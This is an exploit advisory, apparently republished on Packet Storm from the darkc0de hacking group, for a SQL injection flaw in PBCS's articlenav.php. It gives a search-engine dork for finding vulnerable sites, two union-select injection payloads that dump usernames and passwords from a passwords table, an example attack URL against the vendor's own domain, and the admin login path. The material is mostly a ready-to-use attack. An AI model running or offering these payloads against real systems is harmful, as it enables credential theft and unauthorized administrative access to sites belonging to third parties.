PBCS from PBCS Technology suffers from a SQL injection vulnerability in articlenav.php.
2caa69c71d3b8c2715a72a819e166eacb1ad72d4df3210e48c0086b33c734aef
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu --- #
--- QKrun1x - skillfaker - Croathack - Optyx - Nuclear --- #
################################################################
#
# Author: baltazar and sinner_01
#
# Home : www.darkc0de.com & ljuska.org
#
# Email : b4ltazar@gmail.com, sinn3r01@gmail.com
#
# Share the c0de!
#
################################################################
#
# App Name: PBCS
#
# App Home: http://www.pbcstechnology.com/
#
# Dork: inurl:/articlenav.php?id=
#
# POC: -1+union+all+select+1,2,3,null,concat_ws(char(58),username,upassword),6,7+from+passwords--
#
# P0C-2: -1+union+all+select+1,2,3,null,concat_ws(char(58),username,upassword),6+from+passwords--
#
#Example:
# http://www.pbcstechnology.com/articlenav.php?id=-1+union+all+select+1,2,3,null,concat_ws(char(58),username,upassword),6,7+from+passwords/*
#
# Admin: www.site.com/admin
#
################################################################
# Vuln Discovered 08/11/2008
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed